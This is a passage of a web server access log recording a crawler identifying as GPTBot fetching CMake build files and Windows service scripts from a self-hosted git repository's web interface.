"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12026] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12025] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11111] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:01:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:01:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 11255] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:01:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" [Client 74.7.227.38] [Length 9993] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:01:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 12237] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:01:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 13263] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:01:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 17111] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:01:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:01:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12025] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:01:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:01:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:01:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:01:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:01:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 92] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" +[17/Feb/2026:18:01:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 10264] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" +[17/Feb/2026:18:01:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 10018] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" +[17/Feb/2026:18:01:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 1111] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" +[17/Feb/2026:18:01:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" +[17/Feb/2026:18:01:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 2135] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" +[17/Feb/2026:18:01:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 10016] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" +[17/Feb/2026:18:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 9780] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" +[17/Feb/2026:18:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 11716] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" +[17/Feb/2026:18:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 13176] [Gzip 6.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" +[17/Feb/2026:18:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16062] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11234] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" +[17/Feb/2026:18:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15274] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15273] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11201] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11199] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:01:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16062] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:01:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11505] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11505] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:01:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" +[17/Feb/2026:18:01:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:01:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:01:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11182] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:18:01:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 